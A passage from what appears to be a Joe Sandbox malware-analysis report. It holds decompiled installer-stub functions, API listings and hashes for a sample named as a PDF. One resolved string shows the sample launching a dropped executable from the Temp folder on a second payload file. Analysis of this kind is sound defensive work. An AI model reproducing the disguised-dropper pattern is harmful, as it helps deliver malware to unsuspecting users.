				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                            0x00404f8d
                                                                                            0x00404f9a
                                                                                            0x00404fa0
                                                                                            0x00404fde
                                                                                            0x00404fde
                                                                                            0x00404fed
                                                                                            0x00404ff4
                                                                                            0x00000000
                                                                                            0x00404ff6
                                                                                            0x00404fa2
                                                                                            0x00404fb1
                                                                                            0x00404fb9
                                                                                            0x00404fbc
                                                                                            0x00404fce
                                                                                            0x00404fd4
                                                                                            0x00404fdb
                                                                                            0x00000000
                                                                                            0x00404fdb
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                            • GetMessagePos.USER32 ref: 00404FA2
                                                                                            • ScreenToClient.USER32 ref: 00404FBC
                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Send$ClientScreen
                                                                                            • String ID: f
                                                                                            • API String ID: 41195575-1993550816
                                                                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                            • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                            • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                            0x00402fa3
                                                                                            0x00402fb1
                                                                                            0x00402fb7
                                                                                            0x00402fb7
                                                                                            0x00402fc5
                                                                                            0x00402fc7
                                                                                            0x00402fd3
                                                                                            0x00402fd8
                                                                                            0x00402fda
                                                                                            0x00402fda
                                                                                            0x00402fe5
                                                                                            0x00402ff5
                                                                                            0x00403007
                                                                                            0x00403007
                                                                                            0x0040300f

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                            • API String ID: 1451636040-1158693248
                                                                                            • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                            • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                                            • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                            • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                                            0x00402950
                                                                                            0x00402952
                                                                                            0x00402957
                                                                                            0x0040295c
                                                                                            0x0040295f
                                                                                            0x00402969
                                                                                            0x0040296d
                                                                                            0x0040296d
                                                                                            0x00402973
                                                                                            0x00402980
                                                                                            0x00402988
                                                                                            0x0040298b
                                                                                            0x00402997
                                                                                            0x0040299a
                                                                                            0x004029a0
                                                                                            0x004029ae
                                                                                            0x004029b3
                                                                                            0x004029b7
                                                                                            0x004029ba
                                                                                            0x004029c3
                                                                                            0x004029cf
                                                                                            0x004029d3
                                                                                            0x004029d6
                                                                                            0x004029e0
                                                                                            0x004029ff
                                                                                            0x004029e7
                                                                                            0x004029ec
                                                                                            0x004029f4
                                                                                            0x004029f7
                                                                                            0x004029fc
                                                                                            0x004029fc
                                                                                            0x00402a06
                                                                                            0x00402a06
                                                                                            0x00402a13
                                                                                            0x00402a19
                                                                                            0x00402a1f
                                                                                            0x00402a1f
                                                                                            0x004029b7
                                                                                            0x00402a33
                                                                                            0x00402a35
                                                                                            0x00402a35
                                                                                            0x00402a3f
                                                                                            0x00402a40
                                                                                            0x00402a44
                                                                                            0x00402a48
                                                                                            0x00402a4e
                                                                                            0x00402a4e
                                                                                            0x00402a55
                                                                                            0x004022f1
                                                                                            0x00402c2d
                                                                                            0x00402c39

                                                                                            APIs
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                            • GlobalFree.KERNEL32 ref: 00402A06
                                                                                            • GlobalFree.KERNEL32 ref: 00402A19
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2667972263-0
                                                                                            • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                            • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                                            • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                            • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 77%
                                                                                            			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                                                                                            0x00404e7a
                                                                                            0x00404e7f
                                                                                            0x00404e87
                                                                                            0x00404e88
                                                                                            0x00404e95
                                                                                            0x00404e9d
                                                                                            0x00404e9e
                                                                                            0x00404ea0
                                                                                            0x00404ea2
                                                                                            0x00404ea4
                                                                                            0x00404ea7
                                                                                            0x00404ea7
                                                                                            0x00404eae
                                                                                            0x00404eb4
                                                                                            0x00404eb4
                                                                                            0x00404ebb
                                                                                            0x00404ec2
                                                                                            0x00404ec5
                                                                                            0x00404ec8
                                                                                            0x00404ec8
                                                                                            0x00404ecc
                                                                                            0x00404edc
                                                                                            0x00404ede
                                                                                            0x00404ee1
                                                                                            0x00404e8a
                                                                                            0x00404e8a
                                                                                            0x00404e91
                                                                                            0x00404e91
                                                                                            0x00404ee9
                                                                                            0x00404ef4
                                                                                            0x00404f0a
                                                                                            0x00404f1b
                                                                                            0x00404f37

                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                            • wsprintfW.USER32 ref: 00404F1B
                                                                                            • SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                            • String ID: %u.%u%s%s$H7B
                                                                                            • API String ID: 3540041739-107966168
                                                                                            • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                            • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                                            • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                            • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 48%
                                                                                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                            0x00402eb4
                                                                                            0x00402ebd
                                                                                            0x00402ec6
                                                                                            0x00402ed2
                                                                                            0x00402edb
                                                                                            0x00402ee5
                                                                                            0x00402f0a
                                                                                            0x00402f10
                                                                                            0x00402f15
                                                                                            0x00402f16
                                                                                            0x00402f46
                                                                                            0x00402f1f
                                                                                            0x00402f21
                                                                                            0x00402f71
                                                                                            0x00402f74
                                                                                            0x00000000
                                                                                            0x00402f7a
                                                                                            0x00402f30
                                                                                            0x00402f35
                                                                                            0x00402f37
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402f3f
                                                                                            0x00402f44
                                                                                            0x00402f45
                                                                                            0x00402f45
                                                                                            0x00402f52
                                                                                            0x00402f5a
                                                                                            0x00402f61
                                                                                            0x00000000
                                                                                            0x00402f8a
                                                                                            0x00000000
                                                                                            0x00402f69
                                                                                            0x00402ef5
                                                                                            0x00402f08
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402f08
                                                                                            0x00402f90

                                                                                            APIs
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                            • String ID:
                                                                                            • API String ID: 1354259210-0
                                                                                            • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                            • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                            • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                            • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 77%
                                                                                            			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                            0x00401d81
                                                                                            0x00401d85
                                                                                            0x00401d9a
                                                                                            0x00401d87
                                                                                            0x00401d89
                                                                                            0x00401d8f
                                                                                            0x00401d8f
                                                                                            0x00401da0
                                                                                            0x00401da3
                                                                                            0x00401dad
                                                                                            0x00401db0
                                                                                            0x00401db8
                                                                                            0x00401dc9
                                                                                            0x00401dcc
                                                                                            0x00401dd7
                                                                                            0x00401dce
                                                                                            0x00401dd0
                                                                                            0x00401dd0
                                                                                            0x00401ddb
                                                                                            0x00401de5
                                                                                            0x00401e0c
                                                                                            0x00401e1b
                                                                                            0x00401e29
                                                                                            0x00401e31
                                                                                            0x00401e39
                                                                                            0x00401e39
                                                                                            0x00401e42
                                                                                            0x00401e48
                                                                                            0x00402ba4
                                                                                            0x00402ba4
                                                                                            0x00402c2d
                                                                                            0x00402c39

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                            • String ID:
                                                                                            • API String ID: 1849352358-0
                                                                                            • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                            • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                                            • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                            • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 73%
                                                                                            			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                            0x00401e4e
                                                                                            0x00401e59
                                                                                            0x00401e5b
                                                                                            0x00401e68
                                                                                            0x00401e7f
                                                                                            0x00401e84
                                                                                            0x00401e91
                                                                                            0x00401e96
                                                                                            0x00401e9a
                                                                                            0x00401ea5
                                                                                            0x00401eac
                                                                                            0x00401ebe
                                                                                            0x00401ec4
                                                                                            0x00401ec9
                                                                                            0x00401ed3
                                                                                            0x00402638
                                                                                            0x0040156d
                                                                                            0x00402ba4
                                                                                            0x00402c2d
                                                                                            0x00402c39

                                                                                            APIs
                                                                                            • GetDC.USER32(?), ref: 00401E51
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                            • ReleaseDC.USER32 ref: 00401E84
                                                                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
